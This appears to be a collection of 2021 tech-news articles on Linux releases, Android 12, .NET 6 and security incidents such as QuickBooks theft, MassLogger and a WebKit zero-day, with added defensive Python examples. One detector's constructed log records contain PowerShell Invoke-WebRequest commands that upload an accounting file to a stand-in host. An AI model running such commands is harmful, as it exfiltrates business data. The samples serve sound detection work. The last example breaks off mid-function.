The long-awaited release of Mageia 8, the Mandriva Linux-based distribution, has finally arrived, with notable features such as the new GL Vendor Neutral Dispatch (GLVND), which resolves issues with OpenGL support on Linux systems.

Mageia is a GNU/Linux distribution available as free software; it can be installed on PCs as the main operating system or alongside other pre-installed systems in a dual-boot setup.

Mageia 8 brings updates ranging from new packages to the latest Linux kernel, the graphics stack and an upgraded base system.

What's New in Mageia 8 Stable Release



Besides the new GLVND, which resolves issues with OpenGL support on Linux systems, Mageia 8 ships the latest long-term support (LTS) Linux kernel, version 5.10.16, which brings graphics improvements and other core enhancements.



The vendor-neutral libGL implementation means that Mesa and third-party GL drivers can be installed in parallel, which improves performance and functionality, for example on hybrid GPU configurations. For AMD/ATI graphics cards, Mageia 8 uses the AMDGPU driver for newer cards and the Radeon driver for older ones. Other highlights include:

  • Mesa 20.3.4
  • RPM 4.16.1.2, DNF v4.6.0
  • Glibc 2.32, GCC 10.2.1
  • LLVM 10.0.1, X.Org 1.20.10
  • LibreOffice 7.0.4.2
  • Plasma 5.20.4, GNOME 3.38, Xfce 4.16
  • MATE 1.24.2, LXQt 0.16.0, and Cinnamon 4.8.3.


Furthermore, Mageia 8 offers faster package metadata parsing using Zstd, and for UEFI boot the rEFInd boot manager is supported as an alternative to GRUB2. The Java stack has been upgraded to version 11, while Python 2 modules and software such as Iceape and PlayOnLinux have been removed.

How to Download or Upgrade to Mageia 8 Stable Release



If you're new to Mageia and want to try Mageia 8, you can download the torrent file or the ISO image directly from the official page.

Existing users who want to migrate from the previous release will find more information about the upgrade path from Mageia 7 to 8 in the Mageia 8 release notes.

Mageia 8 Stable Release out with GLVND and better ARM support

Google has released the first Developer Preview of Android 12, following its usual release cycle. The next version of Android promises some exciting new features, although the preview builds are intended for developer testing only.

The Android 12 preview build is still highly unstable and prone to unexpected behavior such as UI lag and frequent app crashes; the worst case is losing all the data on your smartphone if it is not properly backed up.

Below is a detailed roadmap for the Android 12 release, including when the developer previews, the public beta builds and the final release will happen.

What are the Android 12 Developer Preview Phases?



The developer previews are released in the early months and focus on new features and APIs for developer testing only, so that required changes can be made after developers have given their feedback.



The Android 12 Developer Preview phases run from February 2021 and provide the development and testing environment, including SDK tools, API reference, system images and emulators. The early baseline build focuses on developer feedback, with new features, APIs and behavior changes, and a priority window for feedback on APIs and reports of any critical issues.

  • Developer Preview 1 (February)
  • Developer Preview 2 (March)
  • Developer Preview 3 (April)


Developer Preview 2 is an incremental update with additional features, APIs and behavior changes, accompanied by developer feedback and early app compatibility testing. Developer Preview 3 is an update for stability and performance, and for getting apps ready for the Public Betas.

System images are provided for a range of Pixel devices (Pixel 4 / 4 XL, Pixel 3a / 3a XL, Pixel 3 / 3 XL and Pixel 2 / 2 XL) for development and testing.

What are the Android 12 Public Beta Phases?



The Public Beta phase is an over-the-air update to early adopters who enrolled in the Android Beta program. It involves continuous compatibility testing and feedback from Android Beta users.

The second beta phase is the Platform Stability milestone, with final APIs, Play publishing opened up, and final compatibility testing for apps, SDKs and libraries.

  • Public Beta 1 (May)
  • Public Beta 2 (June)
  • Public Beta 3 (July)


The release candidate build is the last phase of the public beta and includes the release of compatible updates for apps, SDKs and libraries.

The Final Release Date



The final release of Android 12 to AOSP and the ecosystem is scheduled for Q3 2021 and includes compatible updates for SDKs, apps and libraries, with continued work on targeting Android 12 and adopting its new features and APIs.

If you are a developer and want to start testing the previews, you can install Android 12 on a supported device or set up an emulator for compatibility testing; see the Android 12 update page for details.

Android 12 Roadmap: Developer Previews, Public Betas and Final Release Date

There is a sharp rise in QuickBooks file data theft via social engineering tricks that deliver malware in order to exploit the software.

QuickBooks is an accounting software package developed by Intuit and geared towards small and medium-sized businesses; it is offered as on-premises accounting applications and as cloud-based versions, with facilities for managing and paying bills and for payroll.

According to researchers at ThreatLocker, cybercriminals have employed new malware designed to exfiltrate data from QuickBooks and post it on the Internet, using phishing scams and social engineering tricks to deliver the malware.

How Attackers Exfiltrate Data from QuickBooks



Attackers mainly use email to deliver the malware that exploits the accounting software; one method is sending a PowerShell command that runs from within the email.



The attack takes the form of a PowerShell command that runs when the recipient opens a document attached to the email: a link within that document downloads a malicious file from the Internet. Once the PowerShell command is running, it retrieves the most recent QuickBooks files and uploads them to the Internet.

Another method is running the PowerShell cmdlet Invoke-WebRequest on target systems to upload the relevant QuickBooks data to the Internet without downloading any malware at all. And as the attackers mostly use signed malware, it becomes even harder for antivirus or other threat detection software to detect.

The stolen data is often sold on the dark web; according to the researchers, there are also instances where the attackers use bait-and-switch tactics, posing as suppliers to lure customers into making fraudulent bank transfers.

How to Mitigate against QuickBooks File Data Theft



The exposure increases greatly when QuickBooks file permissions are granted to the "Everyone" group, as the attacker can then target any individual within the company rather than a specific person with the right privileges.

Users are therefore advised to be vigilant against this sort of attack and to ensure that file permissions are not granted to the "Everyone" group, limiting exposure to further attacks. If you are using the Database Server, always check the permissions after running database repairs and confirm that they are locked down.

QuickBooks File Data Theft via Social Engineering tricks

Offensive Security, the developer of Kali Linux, has announced a new version, Kali Linux 2021.1, the first release of the year, with new hacking tools and updated core packages.

The latest release comes on the heels of Kali Linux 2020.4, the final release of the 2020 series, which brought some exciting new penetration testing improvements and tools. Among the novel features of the previous update was Kali's official partnership with byt3bl33d3r, the author of the CrackMapExec (CME) tool, which gives Kali Linux users access to the newest changes in CME even before they are made public, as the Kali package of CME now pulls updates directly from its private codebase.

Kali Linux 2021.1 comes with upgraded core packages, including the Linux kernel, updated to the latest long-term support version 5.10, and the Xfce and KDE Plasma desktop environments, updated to versions 4.16 and 5.20 respectively.

What's New in Kali Linux 2021.1 Release?



Besides the updated core packages, Kali Linux 2021.1 enables the command-not-found package by default. It not only suggests installing the package that provides a command when it is not already installed, but also points out typos with the corrected word, while the original “command not found” message is still given for any command that Kali does not know.



Kali Linux is also teaming up with BC Security for exclusive early access to its “Empire” (powershell-empire) and “StarKiller” tools, and with Joohoi for the renowned Fuzz Faster U Fool (ffuf) tool.

Furthermore, the latest Kali Linux version adds new hacking tools such as Chisel, Airgeddon, Arjun, GitLeaks, DumpsterDiver and HTTProbe. Other key updates include workarounds for mate-terminal, terminator, tmux, konsole and tilix, and upgrades of BusyBox and Rucky to versions 1.32.0 and 2.1, respectively.

How to Download or Upgrade to Kali Linux 2021.1



If you're an existing Kali Linux user and want to upgrade from the previous version to Kali Linux 2021.1, you can upgrade your system by running the following commands:

$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list
$ sudo apt update && sudo apt -y full-upgrade
$ [ -f /var/run/reboot-required ] && sudo reboot -f


Those new to Kali can simply grab the Kali 2021.1 ISO images, which are now available for download for several platforms, including images for ARM-based devices such as the Pinebook and Raspberry Pi.

Kali Linux 2021.1 Release: New hacking Tools and Updated core packages

Web tracking has evolved over the years, with modern trackers monetizing behavioral user logs through intrusive data collection.

According to researchers at Cornell University, a new large-scale anti-tracking evasion scheme leverages CNAME records to include tracker resources in a same-site context. Known as CNAME cloaking, it effectively bypasses anti-tracking measures that rely on fixed hostname-based block lists.

This tracking scheme is gaining huge traction among high-traffic websites, and the researchers, through a combination of automated and manual analyses, found several privacy and security issues inherent to CNAME-based tracking.

Some online trackers are already using the technique against the Safari browser, which recently put strict anti-tracking systems in place.

Why Online Trackers are Switching to Evasive CNAME Cloaking Technique



The cookie-killing barriers put in place by the major browser vendors to enhance user privacy have pushed marketers to look for new techniques to evade the anti-tracking mechanisms those vendors employ.



CNAME cloaking is perhaps the latest such evasive technique: websites use first-party subdomains as aliases for third-party tracking domains, via CNAME records in their DNS configuration, to circumvent online tracker blockers.

Because a CNAME record maps a domain or subdomain to another as an alias, it is an ideal means to sneak tracking code in as a first-party subdomain. CNAME cloaking thus makes tracking code look first-party when it is not: the resource resolves through a CNAME that points to a domain different from the first party's.
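The following Python script, added here as an illustration and not part of the original article or of the research it reports, shows the difference between a hostname-based block list and a CNAME-aware check. It walks a constructed CNAME table (standing in for DNS answers; all names are invented `.test` hosts) and flags a first-party-looking subdomain whose chain leaves the page's registrable domain. The two-label `registrable_domain` helper is a simplification of what a real blocker does with the Public Suffix List.

```python
from typing import Dict, List, Optional

# Constructed CNAME table standing in for DNS answers: each key is a hostname,
# each value is the target of its CNAME record (None means the name has an
# A/AAAA record and the chain ends there). All names are invented.
CONSTRUCTED_DNS: Dict[str, Optional[str]] = {
    "www.news-example.test": None,
    "static.news-example.test": "cdn.news-example.test",
    "cdn.news-example.test": None,
    # first-party-looking subdomain that is really an alias for a third party
    "metrics.news-example.test": "collector.tracker-example.test",
    "collector.tracker-example.test": "edge.tracker-example.test",
    "edge.tracker-example.test": None,
}

# Hostname-based block list as used by classic tracker blockers. It knows the
# tracker's own name but cannot list every first-party alias pointing at it.
HOSTNAME_BLOCKLIST = {"collector.tracker-example.test"}


def registrable_domain(hostname: str) -> str:
    """Return the last two labels of a hostname. Simplification: real blockers
    use the Public Suffix List so that eTLDs such as co.uk are handled."""
    labels = hostname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def resolve_chain(hostname: str, table: Dict[str, Optional[str]],
                  max_hops: int = 8) -> List[str]:
    """Follow CNAME records and return every name in the chain, the queried
    name first, stopping at a terminal record or after max_hops (loop guard)."""
    chain = [hostname]
    for _ in range(max_hops):
        target = table.get(chain[-1])
        if target is None:
            break
        chain.append(target)
    return chain


def hostname_blocked(hostname: str) -> bool:
    """The classic check: block only if the requested name itself is listed."""
    return hostname.lower() in HOSTNAME_BLOCKLIST


def cname_cloaked_tracker(page_host: str, resource_host: str,
                          table: Dict[str, Optional[str]]) -> Optional[str]:
    """Return the third-party name a 'first-party' resource really resolves to,
    or None when the resource genuinely stays within the page's site.

    This is the check CNAME-aware blockers perform: compare the registrable
    domain of every name in the chain with the page's own, and flag chains
    that leave the first party or land on a listed tracker."""
    first_party = registrable_domain(page_host)
    if registrable_domain(resource_host) != first_party:
        return None  # plain third-party request; hostname lists already cover it
    for name in resolve_chain(resource_host, table)[1:]:
        if registrable_domain(name) != first_party or name.lower() in HOSTNAME_BLOCKLIST:
            return name
    return None
```

With the table above, `hostname_blocked("metrics.news-example.test")` is False because the alias is not on the list, while `cname_cloaked_tracker("www.news-example.test", "metrics.news-example.test", CONSTRUCTED_DNS)` follows the chain and returns `collector.tracker-example.test`; the genuinely first-party `static.news-example.test` chain returns None.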

How the Major Browsers look to Mitigate CNAME Cloaking



Mozilla has been a major advocate of browser-side protection that blocks websites from following web users online; online tracking has been shown to benefit advertisers who target specific users, even though it invades their privacy.

Although Mozilla Firefox does not yet block CNAME cloaking out of the box, users can install an add-on like uBlock Origin to block such first-party trackers. Meanwhile, the company has begun rolling out Firefox 86, which boasts privacy features such as Total Cookie Protection, which prevents cross-site tracking by "confin[ing] all the cookies from each website in a separate cookie jar."

Apple, for its part, has released iOS 14.4 with additional safeguards for the Safari browser that build upon its ITP feature to shield against third-party CNAME cloaking, although it does not yet offer a means to unmask and block the tracker domain.

New DNS-based Tracking Evasion employed by Advertising networks

GeckoLinux is a spinoff of openSUSE available in both Static and Rolling editions, with the Static editions based on openSUSE Leap 42.2 and the Rolling edition based on the stable openSUSE Tumbleweed.

Now the GeckoLinux team has announced a new version, GeckoLinux 999.210221, an update for its openSUSE Tumbleweed-based ROLLING editions.

GeckoLinux offers out-of-the-box support for many proprietary media formats, firmware, hardware drivers, and user-installed multimedia applications, which work automatically with restricted media codecs thanks to the prioritized inclusion of the Packman repository.

What's New in GeckoLinux 999.210221 Update



GeckoLinux has continued its focus on eliminating pain points and polishing its unique out-of-the-box configuration on top of the stable and flexible openSUSE base.



The GeckoLinux ROLLING editions use the Calamares system installer version 3.2.27, which provides easy but powerful options for reliable installation of the live system. The Linux kernel included in this set of GeckoLinux ROLLING ISOs is version 5.10.16. The following desktop environments are included, with additional polish in some editions:

  • Gnome 3.38
  • Cinnamon 4.8.6
  • Plasma 5.21 / Framework 5.79.0 / KDE applications 20.12
  • Pantheon (various component versions)
  • XFCE 4.16
  • LXQt 0.16
  • Mate 1.24.1


Furthermore, several components of the Pantheon desktop have been updated, and the Budgie desktop has been upgraded to its latest version, 10.5.2, with improved behavior for Nemo desktop icons and transparency removed for better visibility and contrast.

How to Download or Upgrade to GeckoLinux 999.210221 Update



If you're a new user and want to give the latest version a spin, you can download the GeckoLinux 999.210221 ROLLING edition ISO image here.

Note that the GeckoLinux Rolling editions are based on openSUSE Tumbleweed and come as an offline-installable live DVD / USB image.

GeckoLinux 999.210221 Update: openSUSE spinoff distro as workable alternative

Microsoft has released the first preview of .NET 6, which continues the final part of the .NET unification plan that started with .NET 5.

This next generation of Microsoft's software development platform will include major improvements across all parts of .NET, including cloud, desktop and mobile applications; its larger scope will be delivered over multiple previews and be fully available in the .NET 6 builds.

The beginning of unification was marked by the migration of .NET Framework code and applications to .NET 5; with the arrival of .NET 6 the groundwork is laid for Xamarin developers to use the unified .NET platform.

What’s new in Microsoft .NET 6 Preview 1



The first .NET 6 preview builds on Blazor, a very popular way to write .NET web apps that was first supported on the server and then in the browser with WebAssembly. The company is now extending it so that developers can write Blazor desktop apps and create hybrid client apps that combine web and native UI within a native client application.



It is targeted at web developers who want to offer rich client and offline experiences to their users, and is coupled with .NET Multi-platform App UI, a modern UI toolkit that builds upon and extends Xamarin as part of the .NET 6 unification.

It will enable developers to target Android, iOS, macOS and Windows, with .NET 6 multi-platform mobile and cross-platform support based on integrating and extending Xamarin. There are also multiple efforts to improve containers in .NET 6, including scaling, reducing container size, and improving startup and throughput performance.

How to Get Started with .NET 6 Preview 1



If you're a developer and want to try .NET 6 Preview 1, you can download it for Windows, macOS and Linux as installers and binaries, container images and Linux packages. You can also check out the ASP.NET Core and EF Core posts for more detail on those components.

.NET 6 has been tested with Visual Studio 16.9 Preview 4 and Visual Studio for Mac 8.9; it is recommended that you use those builds to try the .NET 6 preview.

First preview of .NET 6 brings hybrid client app capabilities via Blazor

Google has announced a change to the open-source Chromium project: it will limit access to several Chrome application programming interfaces (APIs) starting March 15, 2021.

The change was necessitated, according to Google, by third-party Chromium-based browsers integrating Google Chrome features, such as Chrome Sync and Click to Call, that are intended only for Google's services.

This has security implications, as users could sign in to their Google Account and store their personal data via Chrome Sync from any third-party Chromium-based browser.

How the Change would impact other Chromium-based browsers



Google's plan to limit some of the Chrome API features it includes inside Chromium will affect not only Chrome Sync but also features such as the Chrome Translate Element, the Chrome Spelling API, the Contacts API and many more.



These APIs are implemented within the Chromium source code, the open-source base of the Chrome browser, and are usually removed or modified by the other companies that build browsers on the Chromium code, adapting it to their own systems, over which they have control.

Google has given third-party companies two months to remove the Chrome-specific APIs from their code before access is cut off. Chromium-based browsers such as Microsoft Edge, Brave and Opera will have to develop and implement their own equivalents to retain those features.

What's the impact on Programmers and End-users?



The change will affect Linux developers on multiple fronts, and in particular Linux users of Chromium browsers may find that the latest versions of their browsers can no longer perform some basic tasks.

There is already growing mistrust between Google and Linux vendors, with the latter edging closer to dropping Chromium. This latest development will leave several others with a bad taste over how Google has failed the open-source community, as it will make all Linux Chromium builds significantly less functional.

Google set to change the rules for Chromium APIs access

Devuan is a fork of Debian that uses sysvinit, runit or OpenRC instead of systemd, maintaining compatibility with other init systems and staying close to other Unix systems.

The Devuan GNU+Linux team has released the second snapshot of its Devuan 3 Beowulf series, Devuan Beowulf 3.1.0, based on the latest Debian 10 Buster. Among its new features, the installer offers three init system options at initial install: OpenRC, SysV init and Runit.

The updated installer also allows you to install any alternative bootloader in place of GRUB, along with multiple other init system choices.

What's New in Devuan Beowulf 3.1.0 Release?



Besides the updated installer, Devuan Beowulf 3.1.0 alters the behavior of the su utility: users now need to run su - to get root's PATH, or use the full path to commands when using plain su. To restore the old behavior of su, add the following line to the /etc/default/su file.



There are also several security and bug fixes, including linux-image-4.19.0-14 Debian 4.19.171-2 (2021-01-30), firefox-esr 78.7.0esr-1~deb10u1 and lightdm 1.26.0-4+devuan1 (which fixes bugs related to power buttons and accessibility features). debian-pulseaudio-config-override now corrects the problem of PulseAudio being off by default.

Additionally, the new point release changes the OS ID, which previously displayed “Debian” in the boot menu, to “Devuan”. See the official release notes for more detailed information.

How to Download or Upgrade to Devuan Beowulf 3.1.0



Existing Devuan Beowulf users simply need to run the command below to get to the latest version:

apt-get update && apt-get dist-upgrade


If you're new to Devuan and want to try Devuan Beowulf 3.1.0, you can get the installer ISOs, desktop-live and minimal-live ISOs from here; they are available for the i386, armhf, arm64, amd64, armel and ppc64el platforms.

Devuan Beowulf 3.1.0: GNU+Linux forked from Debian without systemd

MassLogger is an infamous Trojan targeting the Windows platform; written in .NET, it comes with capabilities to evade detection by Windows security systems.

Now there is a new variant of the Trojan, primarily targeting Microsoft Outlook and Chrome users in Latvia, Turkey and Italy, in a campaign that started in January and is still ongoing. First spotted in April 2020, MassLogger's credential-stealing capabilities have expanded to include instant messenger apps.

According to the researchers at Cisco Talos, this new campaign is aimed at stealing information from browsers and messenger apps of users in Turkey, Latvia and Italy.

How MassLogger's new variant steals credentials from Chrome and Outlook users



The new variant uses the compiled HTML file format to start the infection chain, which lets it run nearly undetected by security systems on Windows. The infection chain appears to focus on business users and uses email as the attack vector: the email carries a RAR attachment containing a compiled HTML (.chm) file.



The rest of the infection chain is split between JavaScript, PowerShell and .NET. The attachments seem to follow the same format, a RAR multi-volume filename extension (e.g., "70727_YK90054_Teknik_Cizimler.R09"), in order to bypass attempts to block RAR attachments by the default ".rar" filename extension.

The filename extension is changed to one of the RAR multi-volume extensions, starting with ".r00", and WinRAR or other RAR-capable unarchivers still open the file without any problem. As the targets are mainly business users in Turkey, Latvia and Italy, the email language matches the targeted recipient's top-level domain.
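An added example, not from the article or from Cisco Talos: a small Python attachment filter that shows why matching only the default ".rar" extension misses the multi-volume names described above, and how pairing the ".rNN" naming pattern with the RAR header bytes catches both renamed and disguised archives. The sample attachments and their header bytes are constructed; only the ".R09" filename comes from the article, and the RAR signatures are the published format magic.

```python
import re
from typing import List, NamedTuple

# RAR archive signatures: RAR 4.x and RAR 5.x headers both start with "Rar!"
# followed by 0x1A 0x07; the next byte distinguishes the format version.
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"

# Default ".rar" plus the multi-volume naming scheme .r00, .r01, ... .r99,
# matched case-insensitively so that ".R09" is caught as well.
RAR_EXTENSION = re.compile(r"\.(rar|r\d{2})$", re.IGNORECASE)


class Attachment(NamedTuple):
    filename: str
    head: bytes  # first bytes of the attachment body


def looks_like_rar_name(filename: str) -> bool:
    return RAR_EXTENSION.search(filename) is not None


def has_rar_magic(head: bytes) -> bool:
    return head.startswith(RAR4_MAGIC) or head.startswith(RAR5_MAGIC)


def classify(att: Attachment) -> str:
    """Combine the name check with content sniffing so neither a renamed
    volume nor RAR content under an innocent extension slips through."""
    by_name = looks_like_rar_name(att.filename)
    by_magic = has_rar_magic(att.head)
    if by_name and by_magic:
        return "rar"
    if by_magic:
        return "rar-disguised"  # RAR header under an unrelated extension
    if by_name:
        return "rar-name-only"  # named like a volume but not RAR content
    return "other"


def naive_filter(filenames: List[str]) -> List[str]:
    """A block rule that only knows the default '.rar' extension, the check
    the article says the multi-volume names are meant to get past."""
    return [f for f in filenames if f.lower().endswith(".rar")]


def content_aware_filter(attachments: List[Attachment]) -> List[str]:
    return [a.filename for a in attachments if classify(a) != "other"]


# Constructed sample attachments; the ".R09" name mirrors the pattern quoted
# in the article, the bytes are synthetic headers, not real malware.
SAMPLES = [
    Attachment("quarterly_report.pdf", b"%PDF-1.7\n"),
    Attachment("drawings.rar", RAR5_MAGIC + b"\x00" * 8),
    Attachment("70727_YK90054_Teknik_Cizimler.R09", RAR4_MAGIC + b"\x00" * 8),
    Attachment("invoice.pdf", RAR4_MAGIC + b"\x00" * 8),
]
```

Run over `SAMPLES`, `naive_filter` stops only `drawings.rar`, while `content_aware_filter` also stops the `.R09` volume and the RAR archive hiding behind a `.pdf` name. Sniffing the first bytes is cheap at a mail gateway and does not depend on the sender's choice of extension.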

How to safeguard against MassLogger's new variant



As the main attack vector remains email, users are advised not to open suspicious emails or their attachments. And if they do open the email, they should not download the attachments for any reason.

Additionally, users are advised to configure their systems to log PowerShell events such as module loading and executed script blocks, as these show the executed code in its deobfuscated form. They should also use an advanced malware protection solution, such as that offered by Cisco, as a better alternative to the built-in Windows protection.
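The advice above to log PowerShell script blocks, and the QuickBooks report's description of Invoke-WebRequest being used to upload files, both point to the same detection: look in Event ID 4104 script block events for web cmdlets that send local data outbound. The Python below is an added example (not from the article, Cisco Talos or ThreatLocker) that runs such a rule over a handful of constructed event records; the sensitive-path rule and all paths, users and URLs are assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed Microsoft-Windows-PowerShell/Operational records. Event ID 4104
# (Script Block Logging) carries the code that actually ran, after PowerShell
# has expanded any obfuscation; 4103 carries module/pipeline logging.
CONSTRUCTED_EVENTS: List[Dict[str, object]] = [
    {"record_id": 101, "event_id": 4104, "user": "CORP\\alice",
     "script": r"Invoke-WebRequest -Uri https://updates.example.test/app.msi -OutFile C:\Temp\app.msi"},
    {"record_id": 102, "event_id": 4103, "user": "CORP\\alice",
     "script": r"Import-Module ActiveDirectory"},
    {"record_id": 103, "event_id": 4104, "user": "CORP\\bob",
     "script": r"Invoke-WebRequest -Uri https://upload.example.test/in -Method Post -InFile C:\Accounting\CompanyFile.QBW"},
    {"record_id": 104, "event_id": 4104, "user": "CORP\\carol",
     "script": r"irm https://upload.example.test/api -Method POST -Body (Get-Content C:\Users\carol\Documents\export.csv -Raw)"},
    {"record_id": 105, "event_id": 4104, "user": "CORP\\dave",
     "script": r"Get-ChildItem C:\Accounting | Sort-Object LastWriteTime -Descending | Select-Object -First 1"},
]

# Cmdlets (and their built-in aliases) that perform HTTP requests.
WEB_CMDLETS = re.compile(r"\b(Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b", re.IGNORECASE)
# Parameters that turn a request into an outbound transfer of local data;
# a plain download with -OutFile does not match.
UPLOAD_PARAMS = re.compile(r"-(Method\s+Post|InFile|Body)\b", re.IGNORECASE)
# Directory the organisation treats as sensitive (assumed for this example).
SENSITIVE_PATH = re.compile(r"C:\\Accounting\\", re.IGNORECASE)


def is_web_upload(script: str) -> bool:
    """True when a script block both calls a web cmdlet and passes data with it."""
    return WEB_CMDLETS.search(script) is not None and UPLOAD_PARAMS.search(script) is not None


def triage(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return one finding per 4104 event that uploads data; severity rises
    when the script touches the sensitive directory."""
    findings = []
    for ev in events:
        if ev["event_id"] != 4104:
            continue  # only script block events carry the executed code
        script = str(ev["script"])
        if not is_web_upload(script):
            continue
        severity = "high" if SENSITIVE_PATH.search(script) else "medium"
        findings.append({"record_id": ev["record_id"], "user": ev["user"], "severity": severity})
    return findings
```

On the constructed records, `triage` returns records 103 (high, because of the accounting path) and 104 (medium); the download in 101 and the file listing in 105 are left alone. Because 4104 records the expanded script text, the same regexes work whether or not the original command line was encoded or obfuscated.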

MassLogger Spyware returns in a new variant with more stealing powers

Kotlin Symbol Processing (KSP) API is an application programming interface for building lightweight compiler plug-ins in the Kotlin language.

While KSP is still in alpha, the Google-developed API, which is similar to the kapt compiler plug-in for annotation processing, is faster and offers direct access to Kotlin compiler capabilities.

It is designed to hide compiler changes, and since it is implemented as a compiler plug-in itself, it minimizes maintenance effort.

What the Kotlin Symbol Processing API brings to the table



The KSP API parses Kotlin code directly, which avoids the build-speed tax imposed by kapt stub generation. Although Kotlin lacks a native annotation processing system, annotation processors such as Room for Kotlin do exist, and there is a library for KSP that acts as a normal annotation processor.



During the alpha phase, it is recommended that KSP and kapt be kept in separate modules: when used in the same module, KSP and the kapt compiler plug-in will likely slow down the build initially.

However, as more and more annotation processors adopt KSP, the tool will become a simple drop-in replacement for Kapt.

How to Get Started with Kotlin Symbol Processing API



If you're a developer and want early access to KSP, the source code and documentation are available on GitHub, and you can see what KSP feels like via the KSP Playground project.

With Kotlin a viable choice for Android app development, KSP is built with the goal of being multiplatform compatible so that it is not tied to the JVM. Compatibility with Kotlin 1.34.0 means that KSP will act as a preprocessor framework for Kotlin programs.

Kotlin Symbol Processing API for building lightweight compiler plug-ins

Swift for TensorFlow is a Google-led project that aimed to integrate the machine learning library with Apple's Swift language; it also includes language-integrated differentiable programming for Swift.

TensorFlow is a popular framework for developing neural networks; as Google Brain's second-generation system, its adoption soared because the common platform for deep learning offers an easy-to-use environment and is a powerful contribution to the world of machine learning.

But the project to integrate the TensorFlow machine learning library with the Swift language is no longer actively developed, though some parts, such as differentiable programming for Swift, remain active.

What are the accomplishments of Swift for TensorFlow?



The developers involved in the project cite a number of accomplishments in the repo, including enabling novel research that combines deep learning with graphical models for 3D motion tracking through the SwiftFusion project.



Another is the addition of language-integrated differentiable programming to Swift, the part of the project that remains in active development, with work continuing in the Swift compiler.

Furthermore, multiple open-source efforts spun off from the project remain in active development, such as PythonKit for Python interoperability with Swift, swift-jupyter for using Swift within Jupyter notebooks, and swift-benchmark for benchmarking Swift code.

What the Future holds for TensorFlow



TensorFlow was developed and released by Google in 2015 as an open-source project, opening the door to everyone, including academics, independent researchers, students, developers and even hackers.

Google made available a version of TensorFlow for academic researchers with built-in binaries, and a version as an API for developers, with the intent of building an active open-source community whose contributions would improve the TensorFlow source code.

However, the future appears bleak for TensorFlow as PyTorch has been luring away its users; PyTorch users cite ease of use as the reason they prefer the Facebook-developed framework over TensorFlow.

Google pulls the plug on Swift for TensorFlow project

The security firm Confiant has disclosed a malvertising campaign that exploited a zero-day vulnerability in WebKit to inject malicious payloads into browsers and redirect users to scam websites.

The Apple-developed WebKit browser engine powers the Safari browser and a host of other web browsers, including Google Chrome, the BlackBerry Browser and the Amazon Kindle browser.

According to Confiant, the first attack was recorded in June 2020 and leveraged a bug that allowed malicious third parties to bypass iframe sandboxing in the WebKit browser engine and run malicious code.

How Malvertisers Exploited the WebKit Zero-Day to Redirect Browser Users to Scam Sites



ScamClub, a malvertising group, exploited how WebKit handles JavaScript event listeners; the flaw makes it possible to break out of the sandbox associated with an inline frame element regardless of the "allow-top-navigation-by-user-activation" attribute, which forbids redirection unless a click event occurs within the iframe.



The bug, tracked as CVE-2021-1801, could allow malicious third parties to bypass the iframe sandboxing policy in the WebKit browser engine that powers Apple Safari and Google Chrome for iOS, and run malicious code.

Over the past 90 days, ScamClub delivered over 50MM malicious impressions, maintaining a low baseline of activity punctuated by frequent manic bursts, with as many as 16MM affected ads served in a single day, according to Confiant.

ScamClub malvertisements are mainly characterized by forced redirections to scam sites that offer prizes to “lucky” users, such as the ubiquitous “You’ve won a Walmart giftcard!” or “You’ve won an iPhone!” pages.

Why Google SafeBrowsing and other browser-based security isn't Enough



Google Safe Browsing was late in reporting the landing pages as malicious, as the domains used in the scheme had been flying under the radar and went undetected by the service.

Apple has since issued a patch for WebKit with improved iframe sandbox enforcement as part of the latest security updates for iOS 14.4 and macOS Big Sur, addressing the issue.

WebKit Zero-Day Vulnerability Exploited by Malvertisers to Scam Users

Apple introduced a number of countermeasures against attacks in the iOS 14.4 update, such as the sandboxed 'BlastDoor' service for parsing untrusted data in iMessage.

Now the company is going harder on bad actors with the iOS 14.5 update, which introduces a fraudulent website check for the Safari browser that also passes the lookup traffic through Apple's own proxy servers to prevent leaking users' IP addresses and protect their privacy.

The "Fraudulent Website Warning" feature alerts users to dangerous websites that have previously been blacklisted or reported as malicious, deceptive or harmful.

How the Safari browser Fraudulent Website Alert will work



Apple relies on Google Safe Browsing, a blacklist service that provides a list of web resources containing malicious or phishing content; Safari computes a hash prefix from the address being visited and checks it against that list.



On a match, Safari requests the full list of URL hashes that correspond to the hash prefix and, if the site is listed, blocks access with a warning to the user. While this approach ensures that the actual website the user is trying to visit is never shared with the safe browsing provider, it would still leak the device's IP address.

Albeit, Safari will proxy the Fraudulent Website Alert service through Apple servers to limit the risk of information leak.
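As an added illustration of the hash-prefix lookup described above (example code, not Apple's or Google's implementation): a toy list provider and client using SHA-256 and 4-byte prefixes as the Safe Browsing Update API does. The URL canonicalisation is simplified, the hostnames and the "apple-proxy" label are constructed, and the provider records what each full-hash request reveals to it.

```python
import hashlib
from urllib.parse import urlsplit


def canonical_expression(url: str) -> str:
    """Simplified canonicalisation (assumption: the real Safe Browsing rules
    also normalise encoding and generate several host/path suffix variants).
    Lower-cases the host and drops scheme, query and fragment."""
    parts = urlsplit(url)
    return f"{(parts.hostname or '').lower()}{parts.path or '/'}"


def full_hash(expression: str) -> bytes:
    return hashlib.sha256(expression.encode("utf-8")).digest()


class ListProvider:
    """Constructed stand-in for the Safe Browsing back end. It publishes only
    hash prefixes; full hashes are served on request, and each request is
    recorded with what it reveals: the prefix and the caller's apparent IP."""

    def __init__(self, unsafe_expressions, prefix_len=4):
        self.prefix_len = prefix_len
        self._full_hashes = {full_hash(e) for e in unsafe_expressions}
        self.requests_seen = []

    def prefix_list(self):
        return {h[: self.prefix_len] for h in self._full_hashes}

    def full_hashes_for(self, prefix: bytes, caller_ip: str):
        self.requests_seen.append((prefix.hex(), caller_ip))
        return {h for h in self._full_hashes if h.startswith(prefix)}


class Browser:
    """Client side of the lookup: local prefix list first, network only on a hit."""

    def __init__(self, provider: ListProvider, device_ip: str, via_proxy=False):
        self.provider = provider
        self.device_ip = device_ip
        self.via_proxy = via_proxy
        self.local_prefixes = provider.prefix_list()  # synced periodically

    def check(self, url: str) -> str:
        h = full_hash(canonical_expression(url))
        prefix = h[: self.provider.prefix_len]
        if prefix not in self.local_prefixes:
            return "safe"  # no request leaves the device
        # Prefix hit: fetch the full hashes behind it. Only the prefix is sent,
        # but without a proxy the provider still learns the device's IP.
        apparent_ip = "apple-proxy" if self.via_proxy else self.device_ip
        matches = self.provider.full_hashes_for(prefix, apparent_ip)
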